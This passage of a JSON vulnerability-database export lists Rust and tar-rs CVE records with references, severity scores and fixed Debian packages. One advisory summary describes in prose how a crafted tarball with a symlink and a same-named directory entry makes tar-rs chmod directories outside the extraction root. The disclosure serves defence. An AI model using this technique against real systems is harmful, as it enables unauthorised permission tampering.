"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7JKZDTBMGAWIFJSNWKBMPO5EAKRR4BEW/", "reference_id": "7JKZDTBMGAWIFJSNWKBMPO5EAKRR4BEW", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7JKZDTBMGAWIFJSNWKBMPO5EAKRR4BEW/" }, { "reference_url": "https://github.com/rust-lang/rust/pull/93110", "reference_id": "93110", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://github.com/rust-lang/rust/pull/93110" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BK32QZLHDC2OVLPKTUHNT2G3VHWHD4LX/", "reference_id": "BK32QZLHDC2OVLPKTUHNT2G3VHWHD4LX", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BK32QZLHDC2OVLPKTUHNT2G3VHWHD4LX/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C63NH72Q7UHJM5V3IVYRI7LVBGGFQMSQ/", "reference_id": "C63NH72Q7UHJM5V3IVYRI7LVBGGFQMSQ", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C63NH72Q7UHJM5V3IVYRI7LVBGGFQMSQ/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CKGTACKMKAPRDPWPTU26GYWBELIRFF5N/", "reference_id": "CKGTACKMKAPRDPWPTU26GYWBELIRFF5N", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CKGTACKMKAPRDPWPTU26GYWBELIRFF5N/" }, { "reference_url": "https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html", "reference_id": "cve-2022-21658.html", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html" }, { "reference_url": "https://github.com/rust-lang/rust/security/advisories/GHSA-r9cc-f5pr-p3j2", "reference_id": "GHSA-r9cc-f5pr-p3j2", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://github.com/rust-lang/rust/security/advisories/GHSA-r9cc-f5pr-p3j2" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://support.apple.com/kb/HT213182", "reference_id": "HT213182", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://support.apple.com/kb/HT213182" }, { "reference_url": "https://support.apple.com/kb/HT213183", "reference_id": "HT213183", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://support.apple.com/kb/HT213183" }, { "reference_url": "https://support.apple.com/kb/HT213186", "reference_id": "HT213186", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://support.apple.com/kb/HT213186" }, { "reference_url": "https://support.apple.com/kb/HT213193", "reference_id": "HT213193", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://support.apple.com/kb/HT213193" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2022:1894", "reference_id": "RHSA-2022:1894", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2022:1894" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" } ], "aliases": [ "CVE-2022-21658" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j9kg-rd4y-y7by" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31472?format=api", "vulnerability_id": "VCID-pbjz-th4w-tqgb", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28879.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28879.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28879", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.77984", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78123", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78102", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78109", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.77992", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78022", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78004", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.7803", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78035", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78061", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78044", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78041", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78077", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78075", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78069", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28879" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28879", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28879" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949211", "reference_id": "1949211", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949211" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1801", "reference_id": "AVG-1801", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1801" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" } ], "aliases": [ "CVE-2021-28879" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pbjz-th4w-tqgb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31471?format=api", "vulnerability_id": "VCID-pvm9-wtbx-1ubx", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28878.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28878.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28878", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77065", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77216", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77195", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77202", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77071", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.771", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77082", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77115", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77124", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77152", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77131", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77126", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77167", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77169", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77161", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28878" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28878", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28878" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949207", "reference_id": "1949207", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949207" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1801", "reference_id": "AVG-1801", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1801" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" } ], "aliases": [ "CVE-2021-28878" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pvm9-wtbx-1ubx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24628?format=api", "vulnerability_id": "VCID-qj1y-b8m1-hyfm", "summary": "tar-rs `unpack_in` can chmod arbitrary directories by following symlinks\n## Summary\n\nWhen unpacking a tar archive, the `tar` crate's `unpack_dir` function uses `fs::metadata()` to check whether a path that already exists is a directory. Because `fs::metadata()` follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory — and subsequently apply `chmod` to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root.\n\n## Reproducer\n\nA malicious tarball contains two entries: (1) a symlink `foo` pointing to an arbitrary external directory, and (2) a directory entry `foo/.` (or just `foo`). When unpacked, `create_dir(\"foo\")` fails with `EEXIST` because the symlink is already on disk. The `fs::metadata()` check then follows the symlink, sees a directory at the target, and allows processing to continue. The directory entry's mode bits are then applied via `chmod`, which also follows the symlink — modifying the permissions of the external target directory.\n\n## Fix \n\nThe fix is very simple, we now use `fs::symlink_metadata()` in `unpack_dir`, so symlinks are detected and rejected rather than followed.\n\n## Credit\n\nThis issue was reported by @xokdvium - thank you!", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33056.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33056.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33056", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01448", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01422", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01431", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.0144", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01446", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01441", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01436", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01432", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01946", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01916", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01922", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01912", "published_at": "2026-04-26T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33056" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33056", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33056" }, { "reference_url": "https://github.com/alexcrichton/tar-rs", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/alexcrichton/tar-rs" }, { "reference_url": "https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T12:59:15Z/" } ], "url": "https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446" }, { "reference_url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T12:59:15Z/" } ], "url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33056", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33056" }, { "reference_url": "https://rustsec.org/advisories/RUSTSEC-2026-0067.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://rustsec.org/advisories/RUSTSEC-2026-0067.html" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131481", "reference_id": "1131481", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131481" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449490", "reference_id": "2449490", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449490" }, { "reference_url": "https://github.com/advisories/GHSA-j4xf-2g29-59ph", "reference_id": "GHSA-j4xf-2g29-59ph", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j4xf-2g29-59ph" }, { "reference_url": "https://usn.ubuntu.com/8138-1/", "reference_id": "USN-8138-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8138-1/" }, { "reference_url": "https://usn.ubuntu.com/8138-2/", "reference_id": "USN-8138-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8138-2/" }, { "reference_url": "https://usn.ubuntu.com/8139-1/", "reference_id": "USN-8139-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8139-1/" }, { "reference_url": "https://usn.ubuntu.com/8168-1/", "reference_id": "USN-8168-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8168-1/" }, { "reference_url": "https://usn.ubuntu.com/8168-2/", "reference_id": "USN-8168-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8168-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1056288?format=api", "purl": "pkg:deb/debian/rustc@1.70.0%2Bdfsg1-9", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.70.0%252Bdfsg1-9" }, { "url": "http://public2.vulnerablecode.io/api/packages/1056290?format=api", "purl": "pkg:deb/debian/rustc@1.86.0%2Bdfsg1-1~bpo13%2B2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.86.0%252Bdfsg1-1~bpo13%252B2" } ], "aliases": [ "CVE-2026-33056", "GHSA-j4xf-2g29-59ph" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qj1y-b8m1-hyfm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80738?format=api", "vulnerability_id": "VCID-wdu6-3vph-aqb7", "summary": "rust: use-after-free or double free in VecDeque::make_contiguous", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36318.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36318.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-36318", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57759", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57834", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57833", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57851", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57843", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57863", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57838", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57893", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57894", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57911", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57887", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57867", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57896", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57895", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57873", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-36318" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36318", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36318" }, { "reference_url": 